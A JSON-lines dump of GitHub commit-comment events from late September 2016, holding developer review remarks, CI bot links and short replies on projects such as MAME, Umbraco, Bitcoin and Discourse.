{"id":"4630773590","type":"CommitCommentEvent","actor":{"login":"KimWanGak"},"repo":{"name":"spil3141/--Group-7-Team-work--"},"payload":{"comment":{"id":19207480,"position":null,"line":null,"path":null,"commit_id":"22f3a9096f4ab64a1e6f754c5215d41f8ab992f9","created_at":"2016-09-28T13:49:21Z","updated_at":"2016-09-28T13:49:21Z","body":"good"}},"created_at":"2016-09-28T13:49:21Z"}
{"id":"4630774988","type":"CommitCommentEvent","actor":{"login":"KimWanGak"},"repo":{"name":"spil3141/--Group-7-Team-work--"},"payload":{"comment":{"id":19207485,"position":null,"line":null,"path":null,"commit_id":"22f3a9096f4ab64a1e6f754c5215d41f8ab992f9","created_at":"2016-09-28T13:49:34Z","updated_at":"2016-09-28T13:49:34Z","body":"good"}},"created_at":"2016-09-28T13:49:34Z"}
{"id":"4630775139","type":"CommitCommentEvent","actor":{"login":"nallath"},"repo":{"name":"Ultimaker/Uranium"},"payload":{"comment":{"id":19207486,"position":25,"line":334,"path":"UM/Settings/Models/SettingPropertyProvider.py","commit_id":"aaf0f8c905d9a8ea1d321a206a41109adc25aa40","created_at":"2016-09-28T13:49:36Z","updated_at":"2016-09-28T13:49:36Z","body":"Fixed; 97112de442331d665a37716e9d2c4039b0bd6650"}},"created_at":"2016-09-28T13:49:36Z"}
{"id":"4630776265","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/balrog"},"payload":{"comment":{"id":19207489,"position":null,"line":null,"path":null,"commit_id":"6f1cc3de29b3b908095d56e04730c7fd5a797154","created_at":"2016-09-28T13:49:48Z","updated_at":"2016-09-28T13:49:48Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#RZxB-zFGSFWmoJpc-9A7-A"}},"created_at":"2016-09-28T13:49:48Z"}
{"id":"4630777389","type":"CommitCommentEvent","actor":{"login":"cuavas"},"repo":{"name":"mamedev/mame"},"payload":{"comment":{"id":19207492,"position":9,"line":82,"path":"src/osd/modules/render/bgfx/chain.cpp","commit_id":"ecf1e166fc6342ecf0664fe1d3af7aecb621c650","created_at":"2016-09-28T13:49:58Z","updated_at":"2016-09-28T13:49:58Z","body":"You need to use `floorf` rather than `floor` if you want to use float."}},"created_at":"2016-09-28T13:49:58Z"}
{"id":"4630777565","type":"CommitCommentEvent","actor":{"login":"KimWanGak"},"repo":{"name":"spil3141/--Group-7-Team-work--"},"payload":{"comment":{"id":19207493,"position":null,"line":null,"path":null,"commit_id":"d6a4bc8d4695deba005d85de579fd454ee6bec76","created_at":"2016-09-28T13:50:00Z","updated_at":"2016-09-28T13:50:00Z","body":"good..."}},"created_at":"2016-09-28T13:50:00Z"}
{"id":"4630781421","type":"CommitCommentEvent","actor":{"login":"KimWanGak"},"repo":{"name":"spil3141/--Group-7-Team-work--"},"payload":{"comment":{"id":19207503,"position":null,"line":null,"path":null,"commit_id":"202fbf565fbf573a18945d98c7cce98f031c59c4","created_at":"2016-09-28T13:50:36Z","updated_at":"2016-09-28T13:50:36Z","body":"good"}},"created_at":"2016-09-28T13:50:36Z"}
{"id":"4630783211","type":"CommitCommentEvent","actor":{"login":"cuavas"},"repo":{"name":"mamedev/mame"},"payload":{"comment":{"id":19207510,"position":164,"line":2401,"path":"src/osd/modules/render/d3d/d3dhlsl.cpp","commit_id":"ecf1e166fc6342ecf0664fe1d3af7aecb621c650","created_at":"2016-09-28T13:50:52Z","updated_at":"2016-09-28T13:50:52Z","body":"These ones are the ones that need to be changed to `floorf` to fix the build."}},"created_at":"2016-09-28T13:50:52Z"}
{"id":"4630783541","type":"CommitCommentEvent","actor":{"login":"scottgonzalez"},"repo":{"name":"scottgonzalez/node-wordpress"},"payload":{"comment":{"id":19207512,"position":31,"line":237,"path":"lib/fields.js","commit_id":"009b818d1ecde90eed77175cca46785e1a12898e","created_at":"2016-09-28T13:50:56Z","updated_at":"2016-09-28T13:50:56Z","body":"From here down should not have been indented. I was only talking about the `var` statement."}},"created_at":"2016-09-28T13:50:56Z"}
{"id":"4630784183","type":"CommitCommentEvent","actor":{"login":"KimWanGak"},"repo":{"name":"spil3141/--Group-7-Team-work--"},"payload":{"comment":{"id":19207514,"position":null,"line":null,"path":null,"commit_id":"1798fc8a6658f51f32f35ca3823d41f144cc151a","created_at":"2016-09-28T13:51:03Z","updated_at":"2016-09-28T13:51:03Z","body":"good"}},"created_at":"2016-09-28T13:51:03Z"}
{"id":"4630784540","type":"CommitCommentEvent","actor":{"login":"bodia-uz"},"repo":{"name":"apollostack/subscriptions-transport-ws"},"payload":{"comment":{"id":19207517,"position":4,"line":11,"path":"package.json","commit_id":"23e06479e2a4403cbdb07f61a17761b0db8b79eb","created_at":"2016-09-28T13:51:06Z","updated_at":"2016-09-28T13:51:06Z","body":"I seems that  package `@types/node` is private\r\n```\r\nnpm install subscriptions-transport-ws -S\r\nnpm ERR! Darwin 15.6.0\r\nnpm ERR! argv \"/usr/local/Cellar/node/6.5.0/bin/node\" \"/usr/local/bin/npm\" \"install\" \"subscriptions-transport-ws\" \"-S\"\r\nnpm ERR! node v6.5.0\r\nnpm ERR! npm  v3.10.3\r\nnpm ERR! code E403\r\n\r\nnpm ERR! user npmuser is not allowed to access package @types/node : @types/node\r\n```"}},"created_at":"2016-09-28T13:51:06Z"}
{"id":"4630784628","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/example-addon-repo"},"payload":{"comment":{"id":19207518,"position":null,"line":null,"path":null,"commit_id":"8f835310eea4dc15a9865d1006d8abaae2e8d56f","created_at":"2016-09-28T13:51:07Z","updated_at":"2016-09-28T13:51:07Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#VquJfDBDQYG1vQm3czoKmw"}},"created_at":"2016-09-28T13:51:07Z"}
{"id":"4630785596","type":"CommitCommentEvent","actor":{"login":"eliperkins"},"repo":{"name":"apple/swift"},"payload":{"comment":{"id":19207522,"position":null,"line":null,"path":null,"commit_id":"9009eaf968f630bc23070aaec9ea73ee38934961","created_at":"2016-09-28T13:51:15Z","updated_at":"2016-09-28T13:51:15Z","body":"Should it be added under the Swift 3.1 section on the changelog?"}},"created_at":"2016-09-28T13:51:15Z"}
{"id":"4630786454","type":"CommitCommentEvent","actor":{"login":"tgxworld"},"repo":{"name":"discourse/discourse"},"payload":{"comment":{"id":19207523,"position":9,"line":22,"path":"app/assets/javascripts/discourse/templates/mobile/discovery/topics.hbs","commit_id":"2ce8845c899930a9553385f542df0fc6cc0ab69d","created_at":"2016-09-28T13:51:22Z","updated_at":"2016-09-28T13:51:22Z","body":"@xfalcox Do we need the 2 lines above? I don't think there is a way to configure the order on the mobile view :smile: "}},"created_at":"2016-09-28T13:51:22Z"}
{"id":"4630788035","type":"CommitCommentEvent","actor":{"login":"scottgonzalez"},"repo":{"name":"scottgonzalez/node-wordpress"},"payload":{"comment":{"id":19207528,"position":25,"line":235,"path":"lib/fields.js","commit_id":"009b818d1ecde90eed77175cca46785e1a12898e","created_at":"2016-09-28T13:51:38Z","updated_at":"2016-09-28T13:51:38Z","body":"The indentation I was referring to is:\r\n\r\n```js\r\nvar keys = Object.keys( size ),\r\n    results = {};\r\n```"}},"created_at":"2016-09-28T13:51:38Z"}
{"id":"4630796611","type":"CommitCommentEvent","actor":{"login":"flibitijibibo"},"repo":{"name":"TheRealVira/BugReproduction"},"payload":{"comment":{"id":19207539,"position":47,"line":31,"path":"BugReproduction/Content/Shader/P2.fx","commit_id":"a265605a7c12dd588651796edc40b72aeb0bc2cd","created_at":"2016-09-28T13:52:58Z","updated_at":"2016-09-28T13:52:58Z","body":"This vertex shader introduces a bug aside from the MG bug where the primitives aren't actually going to be where you might expect (they'll be occupying the top right corner of the screen since all the vertex positions fall under [0, inf) rather than [-1, 1]). You probably want to copypaste this vertex shader for testing instead:\r\n\r\nhttps://github.com/FNA-XNA/FNA/blob/master/src/Graphics/Effect/StockEffects/HLSL/SpriteEffect.fx#L22\r\n\r\nThat said, the original shader appears to be just fine outside of MG:\r\n\r\n![screenshot from 2016-09-28 09-47-14](https://cloud.githubusercontent.com/assets/1396814/18915919/9c5a1d8c-8560-11e6-9870-21e2bc8f83d0.png)\r\n\r\nI would grab [apitrace](http://apitrace.github.io/) and compare a trace of your original code with this (it won't be identical to this, but it should be roughly the same):\r\n\r\n![screenshot from 2016-09-28 09-49-11](https://cloud.githubusercontent.com/assets/1396814/18915991/d95e8d94-8560-11e6-97ee-b307aacbc06a.png)\r\n\r\nThe part you care about is the glDrawElements calls and the attached shaders at those calls, which you can inspect when looking up the state of each call."}},"created_at":"2016-09-28T13:52:58Z"}
{"id":"4630801214","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19207548,"position":null,"line":null,"path":null,"commit_id":"65af9b8a623de6faa71c39ca0b9583a69c2d1fc3","created_at":"2016-09-28T13:53:41Z","updated_at":"2016-09-28T13:53:41Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1190](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14475&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-28T13:53:41Z"}
{"id":"4630804828","type":"CommitCommentEvent","actor":{"login":"nul800sebastiaan"},"repo":{"name":"umbraco/Umbraco-CMS"},"payload":{"comment":{"id":19207556,"position":20,"line":341,"path":"build/NuSpecs/tools/Web.config.install.xdt","commit_id":"248177f518908dd531e6d36553c4d4dc726f8396","created_at":"2016-09-28T13:54:15Z","updated_at":"2016-09-28T13:54:15Z","body":"This won't work if someone already has put their own assembly redirect in there to version whatever.. let's say to version 3.3.0 - which is what the Remove transform was for, which is now not there any more."}},"created_at":"2016-09-28T13:54:15Z"}
{"id":"4630804962","type":"CommitCommentEvent","actor":{"login":"sdaftuar"},"repo":{"name":"sdaftuar/bitcoin"},"payload":{"comment":{"id":19207557,"position":5,"line":5288,"path":"src/main.cpp","commit_id":"d990722b56f02f3272c49eeef4c952992bd9efaa","created_at":"2016-09-28T13:54:17Z","updated_at":"2016-09-28T13:54:17Z","body":"Now that I look at it again, I think this is broken already because there's no check to ensure nodestate->fProvidesHeaderAndIDs == true.\r\n\r\n(Still thinking about a hypothetical v3 sendcmpct)"}},"created_at":"2016-09-28T13:54:17Z"}
{"id":"4630806590","type":"CommitCommentEvent","actor":{"login":"justinbmeyer"},"repo":{"name":"canjs/bit-docs-html-canjs"},"payload":{"comment":{"id":19207561,"position":5,"line":5,"path":"templates/title.mustache","commit_id":"b9e84c4ff6e10ce5a2ff58e45b02875af754e8d8","created_at":"2016-09-28T13:54:31Z","updated_at":"2016-09-28T13:54:31Z","body":"@andreaalmeida It should look like the button I put in the issue instead of the `npm install` instructions."}},"created_at":"2016-09-28T13:54:31Z"}
{"id":"4630807007","type":"CommitCommentEvent","actor":{"login":"lindafan129"},"repo":{"name":"lindafan129/ffd"},"payload":{"comment":{"id":19207562,"position":null,"line":null,"path":null,"commit_id":"2940e4fef9e78d8ccee79ae10f404054664dc281","created_at":"2016-09-28T13:54:36Z","updated_at":"2016-09-28T13:54:36Z","body":"MERGE2"}},"created_at":"2016-09-28T13:54:36Z"}
{"id":"4630809090","type":"CommitCommentEvent","actor":{"login":"cash"},"repo":{"name":"cabishop/dorset-framework"},"payload":{"comment":{"id":19207568,"position":39,"line":159,"path":"core/src/main/java/edu/jhuapl/dorset/Application.java","commit_id":"0395eb581a02ad42b9899507a83f767a761e86d8","created_at":"2016-09-28T13:54:55Z","updated_at":"2016-09-28T13:54:55Z","body":"Make sure you run `mvn checkstyle:check` on code before committing/pushing. You have some spacing issues in this code."}},"created_at":"2016-09-28T13:54:55Z"}
{"id":"4630809473","type":"CommitCommentEvent","actor":{"login":"RodolpheFouquet"},"repo":{"name":"gpac/gpac"},"payload":{"comment":{"id":19207569,"position":null,"line":null,"path":null,"commit_id":"705e199c8eadf35774520206d7f7cf1a043c0539","created_at":"2016-09-28T13:54:59Z","updated_at":"2016-09-28T13:54:59Z","body":"I have put the SensorServices class into the new project. However this class didn't seem to be used before. Could that be related to that?"}},"created_at":"2016-09-28T13:54:59Z"}
{"id":"4630809833","type":"CommitCommentEvent","actor":{"login":"Dorkstars"},"repo":{"name":"consolidation/Robo"},"payload":{"comment":{"id":19207572,"position":null,"line":null,"path":null,"commit_id":"551a819e7613bed45404641e52c90f0368e9b309","created_at":"2016-09-28T13:55:02Z","updated_at":"2016-09-28T13:55:02Z","body":"@greg-1-anderson Hello, when this will be added to .phar file, because i have same error running parallelExec with process and taskCodecept"}},"created_at":"2016-09-28T13:55:02Z"}
{"id":"4630810131","type":"CommitCommentEvent","actor":{"login":"Shazwazza"},"repo":{"name":"umbraco/Umbraco-CMS"},"payload":{"comment":{"id":19207575,"position":20,"line":341,"path":"build/NuSpecs/tools/Web.config.install.xdt","commit_id":"248177f518908dd531e6d36553c4d4dc726f8396","created_at":"2016-09-28T13:55:05Z","updated_at":"2016-09-28T13:55:05Z","body":"Yes but the install and upgrade 100% fails if the remove is in there"}},"created_at":"2016-09-28T13:55:05Z"}
{"id":"4630810641","type":"CommitCommentEvent","actor":{"login":"justinbmeyer"},"repo":{"name":"canjs/bit-docs-html-canjs"},"payload":{"comment":{"id":19207577,"position":5,"line":5,"path":"templates/title.mustache","commit_id":"b9e84c4ff6e10ce5a2ff58e45b02875af754e8d8","created_at":"2016-09-28T13:55:09Z","updated_at":"2016-09-28T13:55:09Z","body":"![version_badge_for_npm__rubygems__pypi__bower_and_other_packages](https://cloud.githubusercontent.com/assets/78602/18881430/dc68736c-84a0-11e6-971c-7e1134f0fa19.png)"}},"created_at":"2016-09-28T13:55:09Z"}
{"id":"4630812970","type":"CommitCommentEvent","actor":{"login":"davepatterson"},"repo":{"name":"jpotts18/SwiftValidator"},"payload":{"comment":{"id":19207582,"position":null,"line":null,"path":null,"commit_id":"761df17e0439330d6b7a22b344865d131a82d8c9","created_at":"2016-09-28T13:55:31Z","updated_at":"2016-09-28T13:55:31Z","body":"@jpotts18 Should switching from xcodebuild to xctool fix the issue we have with travis ci?"}},"created_at":"2016-09-28T13:55:31Z"}
{"id":"4630818561","type":"CommitCommentEvent","actor":{"login":"AcesHigh70"},"repo":{"name":"digipost/saaj"},"payload":{"comment":{"id":19207595,"position":null,"line":null,"path":null,"commit_id":"fe02d272512207008413a5d8167a710a727f93a1","created_at":"2016-09-28T13:56:25Z","updated_at":"2016-09-28T13:56:25Z","body":"return (PR == Pull Request) ? \"Yeah!\" : \"I'm a dum dum\";\r\n\r\nI can make the thread safety changes in ContextClassloaderLocal, but someone else will need to do performance comparisons if you think that's necessary.  Once ContextClassloaderLocal is thread safe, fe02d27 can be rolled back."}},"created_at":"2016-09-28T13:56:25Z"}
{"id":"4630819341","type":"CommitCommentEvent","actor":{"login":"cash"},"repo":{"name":"cabishop/dorset-framework"},"payload":{"comment":{"id":19207599,"position":46,"line":76,"path":"core/src/main/java/edu/jhuapl/dorset/agents/AgentRequest.java","commit_id":"0395eb581a02ad42b9899507a83f767a761e86d8","created_at":"2016-09-28T13:56:33Z","updated_at":"2016-09-28T13:56:33Z","body":"Looks like you copied documentation without updating"}},"created_at":"2016-09-28T13:56:33Z"}
{"id":"4630820243","type":"CommitCommentEvent","actor":{"login":"lindafan129"},"repo":{"name":"lindafan129/ffd"},"payload":{"comment":{"id":19207602,"position":null,"line":null,"path":null,"commit_id":"7b2eedc0635232981857a529ceb01a2728e2674d","created_at":"2016-09-28T13:56:42Z","updated_at":"2016-09-28T13:56:42Z","body":"3"}},"created_at":"2016-09-28T13:56:42Z"}
{"id":"4630820847","type":"CommitCommentEvent","actor":{"login":"Therzok"},"repo":{"name":"mono/monodevelop"},"payload":{"comment":{"id":19207604,"position":null,"line":null,"path":null,"commit_id":"a0b27d3c20fdf91a895dd7bb8c7afa0819d3624a","created_at":"2016-09-28T13:56:48Z","updated_at":"2016-09-28T13:56:48Z","body":":+1: Thanks for this"}},"created_at":"2016-09-28T13:56:48Z"}
{"id":"4630823593","type":"CommitCommentEvent","actor":{"login":"henrik"},"repo":{"name":"barsoom/review"},"payload":{"comment":{"id":19207610,"position":14,"line":14,"path":"lib/review/authentication.ex","commit_id":"ca31e088e5eb649e005364c8309287441a1d87ad","created_at":"2016-09-28T13:57:13Z","updated_at":"2016-09-28T13:57:13Z","body":"This looks dangerous."}},"created_at":"2016-09-28T13:57:13Z"}
{"id":"4630826557","type":"CommitCommentEvent","actor":{"login":"philippebolduc"},"repo":{"name":"rear/rear"},"payload":{"comment":{"id":19207616,"position":null,"line":null,"path":null,"commit_id":"847323fbedefda7376530bd2e3e13cae87fa9b38","created_at":"2016-09-28T13:57:40Z","updated_at":"2016-09-28T13:57:40Z","body":"You should alse do the same on line 53 because the option --test-label is not supported on Centos 5 who have tar version 1.15.\r\n\r\nThanks."}},"created_at":"2016-09-28T13:57:40Z"}
{"id":"4630827258","type":"CommitCommentEvent","actor":{"login":"attackmodeninja"},"repo":{"name":"attackmodeninja/tools"},"payload":{"comment":{"id":19207618,"position":null,"line":null,"path":null,"commit_id":"73f44b65ed33dc350e3bd2a525c48a7967bb5ef6","created_at":"2016-09-28T13:57:46Z","updated_at":"2016-09-28T13:57:46Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Test](https://trello.com/c/i85UqUPG/1-test)"}},"created_at":"2016-09-28T13:57:46Z"}
{"id":"4630828435","type":"CommitCommentEvent","actor":{"login":"chromi"},"repo":{"name":"dtaht/tc-adv"},"payload":{"comment":{"id":19207621,"position":null,"line":null,"path":null,"commit_id":"2c7ddd720a85f1814b9099945f6981e4ab8b8105","created_at":"2016-09-28T13:57:57Z","updated_at":"2016-09-28T13:57:57Z","body":"\n> On 28 Sep, 2016, at 12:14, moeller0 <notifications@github.com> wrote:\n> \n> This seems rather unexpected, for ATM/PTM the same is achieved by using the via-ethernet keyword, why treat DOCSIS any different? \n\nBecause there’s a 50/50 chance that an ADSL/VDSL2 interface is “IP type” rather than “Ethernet type” depending on the variety of hardware; I’ve specified all of those options in terms of the underlying IP packet for consistency.  OpenWRT and LEDE are capable of running directly on many DSL modems.\n\nBy contrast, I’m so far unaware of *any* cable modem which is not accessed via an Ethernet-type interface, or on which custom firmware can be loaded.  Having to state that explicitly seemed just too verbose, and most users would likely get it wrong unless the distinction was pointed out very explicitly.  “But I have a cable modem, and this is the option for cable modems - right?\"\n\nOn the upside, this time I *am* writing documentation.  It’s taking a while.\n\nI suppose the ideal would be for Cake to check whether it’s running on an IP or Ethernet interface, and make the correction automatically.  I need more coffee before I can figure that out.\n\n - Jonathan Morton\n\n"}},"created_at":"2016-09-28T13:57:57Z"}
{"id":"4630830238","type":"CommitCommentEvent","actor":{"login":"nul800sebastiaan"},"repo":{"name":"umbraco/Umbraco-CMS"},"payload":{"comment":{"id":19207627,"position":20,"line":341,"path":"build/NuSpecs/tools/Web.config.install.xdt","commit_id":"248177f518908dd531e6d36553c4d4dc726f8396","created_at":"2016-09-28T13:58:15Z","updated_at":"2016-09-28T13:58:15Z","body":"Makes no sense, HtmlAgilityPack is also not there on a clean install (starting with an almost empty web.config and then installing umbraco nuget for the first time)."}},"created_at":"2016-09-28T13:58:15Z"}
{"id":"4630830996","type":"CommitCommentEvent","actor":{"login":"macool"},"repo":{"name":"noggalito/porttare-backend"},"payload":{"comment":{"id":19207629,"position":76,"line":48,"path":"app/controllers/api/provider/dispatchers_controller.rb","commit_id":"8a1abbdd377029eff599a127e6d072b662cdf3c9","created_at":"2016-09-28T13:58:22Z","updated_at":"2016-09-28T13:58:22Z","body":"estas cosas deben ir al modelo"}},"created_at":"2016-09-28T13:58:22Z"}
{"id":"4630832390","type":"CommitCommentEvent","actor":{"login":"simbowang"},"repo":{"name":"simbowang/special-octo-eureka"},"payload":{"comment":{"id":19207631,"position":null,"line":null,"path":null,"commit_id":"ee69d74f49448e60c88c71da29c4b84e676e7c40","created_at":"2016-09-28T13:58:35Z","updated_at":"2016-09-28T13:58:35Z","body":"txtxtxt"}},"created_at":"2016-09-28T13:58:35Z"}
{"id":"4630834614","type":"CommitCommentEvent","actor":{"login":"williampeer"},"repo":{"name":"digipost/ios"},"payload":{"comment":{"id":19207637,"position":5,"line":677,"path":"Digipost/Base.lproj/Main_iPhone.storyboard","commit_id":"afb6e6b09eb214864a956edd488d9ec3e539709c","created_at":"2016-09-28T13:58:56Z","updated_at":"2016-09-28T13:58:56Z","body":":["}},"created_at":"2016-09-28T13:58:56Z"}
{"id":"4630838810","type":"CommitCommentEvent","actor":{"login":"fsantanna"},"repo":{"name":"avmss3101/EDL"},"payload":{"comment":{"id":19207645,"position":null,"line":null,"path":null,"commit_id":"8654f09fc55a1d4f7da092a8fa942a34c31923ec","created_at":"2016-09-28T13:59:34Z","updated_at":"2016-09-28T13:59:34Z","body":"3 dos 6 podem ser corrigidos..."}},"created_at":"2016-09-28T13:59:34Z"}
{"id":"4630839296","type":"CommitCommentEvent","actor":{"login":"macool"},"repo":{"name":"noggalito/porttare-backend"},"payload":{"comment":{"id":19207647,"position":112,"line":74,"path":"app/controllers/api/provider/dispatchers_controller.rb","commit_id":"8a1abbdd377029eff599a127e6d072b662cdf3c9","created_at":"2016-09-28T13:59:38Z","updated_at":"2016-09-28T13:59:38Z","body":"y yo sugeriría que no haya #update\r\n\r\nlo podemos validar con PM?"}},"created_at":"2016-09-28T13:59:38Z"}
{"id":"4630840151","type":"CommitCommentEvent","actor":{"login":"nul800sebastiaan"},"repo":{"name":"umbraco/Umbraco-CMS"},"payload":{"comment":{"id":19207650,"position":20,"line":341,"path":"build/NuSpecs/tools/Web.config.install.xdt","commit_id":"248177f518908dd531e6d36553c4d4dc726f8396","created_at":"2016-09-28T13:59:46Z","updated_at":"2016-09-28T13:59:46Z","body":"_testing this now_"}},"created_at":"2016-09-28T13:59:46Z"}
{"id":"4630842803","type":"CommitCommentEvent","actor":{"login":"wdlkmpx"},"repo":{"name":"puppylinux-woof-CE/woof-CE"},"payload":{"comment":{"id":19207655,"position":null,"line":null,"path":null,"commit_id":"b4d4a0728ed5ac5b449c570961fa6a2b1a491476","created_at":"2016-09-28T14:00:11Z","updated_at":"2016-09-28T14:00:11Z","body":"you're right. this adds about 40-50kb to the iso, and provides more tools to play with by default.. an educational approach. i like small isos, but i also like something that has at least something that serves as a basis to learn more or to make puppy more usable for a wider range of users. i do this with the very basic packages. i don't touch anything else, i would take out some packages and so on."}},"created_at":"2016-09-28T14:00:11Z"}
{"id":"4630843151","type":"CommitCommentEvent","actor":{"login":"schmunk42"},"repo":{"name":"schmunk42/yii2-giiant"},"payload":{"comment":{"id":19207657,"position":null,"line":null,"path":null,"commit_id":"cbe3741418b746fca59beb521a80794d1edc3a26","created_at":"2016-09-28T14:00:14Z","updated_at":"2016-09-28T14:00:14Z","body":"It's currently only available on `master` and you can't really depend on that in an extension, since you won't see that unless your `minimum-stability` is set to `dev`.\r\n\r\nWe'll have to wait for the next release of `yii2-gii`."}},"created_at":"2016-09-28T14:00:14Z"}
{"id":"4630848558","type":"CommitCommentEvent","actor":{"login":"alexfrieden"},"repo":{"name":"ccgd-profile/BreaKmer"},"payload":{"comment":{"id":19207664,"position":null,"line":null,"path":null,"commit_id":"3a3831563048b3aa16c04e86c8b6abe213136106","created_at":"2016-09-28T14:01:01Z","updated_at":"2016-09-28T14:01:01Z","body":"@DNA-language the master branch is not currently a fully tested branch.  Please use our latest release branch.  As of today that is https://github.com/ccgd-profile/BreaKmer/tree/Breakmer_0.0.6_b"}},"created_at":"2016-09-28T14:01:01Z"}
{"id":"4630849266","type":"CommitCommentEvent","actor":{"login":"Shazwazza"},"repo":{"name":"umbraco/Umbraco-CMS"},"payload":{"comment":{"id":19207670,"position":20,"line":341,"path":"build/NuSpecs/tools/Web.config.install.xdt","commit_id":"248177f518908dd531e6d36553c4d4dc726f8396","created_at":"2016-09-28T14:01:08Z","updated_at":"2016-09-28T14:01:08Z","body":"You can try it if you like. For all new installs and upgrades with this in there, it will say: install failed rolling back ....\r\n\r\nWhich took me many hours to solve by trial and error. Removing this fixes it. I tried googling, etc... apparently there is an issue with some Nuget, I updated to latest, repaired VS, reinstalled Nuget package mgr, etc...  \r\n\r\nYou can absolutely give it a try and see what happens on your machine\r\n\r\n"}},"created_at":"2016-09-28T14:01:08Z"}
{"id":"4630851564","type":"CommitCommentEvent","actor":{"login":"hornteddy"},"repo":{"name":"Loimey/Annuaire"},"payload":{"comment":{"id":19207675,"position":null,"line":null,"path":null,"commit_id":"66592dc077bdb6944fd39998e47d1c2512fb0838","created_at":"2016-09-28T14:01:29Z","updated_at":"2016-09-28T14:01:29Z","body":"voila"}},"created_at":"2016-09-28T14:01:29Z"}
{"id":"4630856068","type":"CommitCommentEvent","actor":{"login":"MajorPlayz"},"repo":{"name":"Intyre/Test"},"payload":{"comment":{"id":19207686,"position":null,"line":null,"path":null,"commit_id":"7554a862e0eabcc514dc79d404c3edd40da94825","created_at":"2016-09-28T14:02:11Z","updated_at":"2016-09-28T14:02:11Z","body":":| lol what is this"}},"created_at":"2016-09-28T14:02:11Z"}
{"id":"4630857331","type":"CommitCommentEvent","actor":{"login":"jimishjoban"},"repo":{"name":"parity/doorkeeper"},"payload":{"comment":{"id":19207693,"position":5,"line":54,"path":"lib/doorkeeper/oauth/refresh_token_request.rb","commit_id":"cdf1c2f408003624cc15f4ef9d65d8173a0b506c","created_at":"2016-09-28T14:02:20Z","updated_at":"2016-09-28T14:02:20Z","body":"Should it find in a particular order?"}},"created_at":"2016-09-28T14:02:20Z"}
{"id":"4630860730","type":"CommitCommentEvent","actor":{"login":"SETEDUDANT"},"repo":{"name":"SETEDUDANT/HotelSim"},"payload":{"comment":{"id":19207697,"position":5,"line":5,"path":"README.md","commit_id":"db120ddf0fe5d771ebb6db40005a3b3c78d15f70","created_at":"2016-09-28T14:02:50Z","updated_at":"2016-09-28T14:02:50Z","body":"koffer"}},"created_at":"2016-09-28T14:02:50Z"}
{"id":"4630862758","type":"CommitCommentEvent","actor":{"login":"PeterGerrard"},"repo":{"name":"red-gate/sqlrelease-vststask"},"payload":{"comment":{"id":19207701,"position":7,"line":2,"path":"TheTask/task.json","commit_id":"a0430f1d7f3a4cb6d71c92309c3d6b8ad5c17e53","created_at":"2016-09-28T14:03:09Z","updated_at":"2016-09-28T14:03:09Z","body":"We also need to rename the contribution: https://github.com/red-gate/sqlrelease-vststask/blob/rename-to-v2/extension-manifest.json#L54"}},"created_at":"2016-09-28T14:03:09Z"}
{"id":"4630867806","type":"CommitCommentEvent","actor":{"login":"sdaftuar"},"repo":{"name":"sdaftuar/bitcoin"},"payload":{"comment":{"id":19207717,"position":5,"line":5288,"path":"src/main.cpp","commit_id":"d990722b56f02f3272c49eeef4c952992bd9efaa","created_at":"2016-09-28T14:03:58Z","updated_at":"2016-09-28T14:03:58Z","body":"I'm not sure how this would break with a v3 sendcmpct -- releases with this code would only negotiate either v1 or v2 compact blocks with any peer, so I think this code should be correct even if there are peers running a v3 sendcmpct protocol...  \r\n\r\nIs there a scenario you have in mind that I'm missing?"}},"created_at":"2016-09-28T14:03:58Z"}
{"id":"4630867862","type":"CommitCommentEvent","actor":{"login":"chromi"},"repo":{"name":"dtaht/sch_cake"},"payload":{"comment":{"id":19207718,"position":null,"line":null,"path":null,"commit_id":"669e5b8bf3a4593261898dcd035359fd29105bbd","created_at":"2016-09-28T14:03:58Z","updated_at":"2016-09-28T14:03:58Z","body":"\n> On 28 Sep, 2016, at 12:04, moeller0 <notifications@github.com> wrote:\n> \n> \"The PTM-TC then performs 64/65-octet encapsulation on the frame”\n\nIf true, that does further simplify the calculation.\n\n - Jonathan Morton\n\n"}},"created_at":"2016-09-28T14:03:58Z"}
{"id":"4630868710","type":"CommitCommentEvent","actor":{"login":"nul800sebastiaan"},"repo":{"name":"umbraco/Umbraco-CMS"},"payload":{"comment":{"id":19207719,"position":20,"line":341,"path":"build/NuSpecs/tools/Web.config.install.xdt","commit_id":"248177f518908dd531e6d36553c4d4dc726f8396","created_at":"2016-09-28T14:04:07Z","updated_at":"2016-09-28T14:04:07Z","body":"It's because there's a typo: `/@name:'AutoMapper'` needs to be `/@name='AutoMapper'` - fixing."}},"created_at":"2016-09-28T14:04:07Z"}
{"id":"4630872161","type":"CommitCommentEvent","actor":{"login":"schmunk42"},"repo":{"name":"schmunk42/yii2-giiant"},"payload":{"comment":{"id":19207732,"position":null,"line":null,"path":null,"commit_id":"cbe3741418b746fca59beb521a80794d1edc3a26","created_at":"2016-09-28T14:04:40Z","updated_at":"2016-09-28T14:04:40Z","body":"https://github.com/schmunk42/yii2-giiant/issues/175"}},"created_at":"2016-09-28T14:04:40Z"}
{"id":"4630873148","type":"CommitCommentEvent","actor":{"login":"AlexeyBatrachenko"},"repo":{"name":"AlexeyBatrachenko/Roofnest"},"payload":{"comment":{"id":19207736,"position":null,"line":null,"path":null,"commit_id":"8224b23ea3626c1a7363e4c8c315c3f22e137185","created_at":"2016-09-28T14:04:50Z","updated_at":"2016-09-28T14:04:50Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Разработка модели БД](https://trello.com/c/h8xREaEO/25--)"}},"created_at":"2016-09-28T14:04:50Z"}
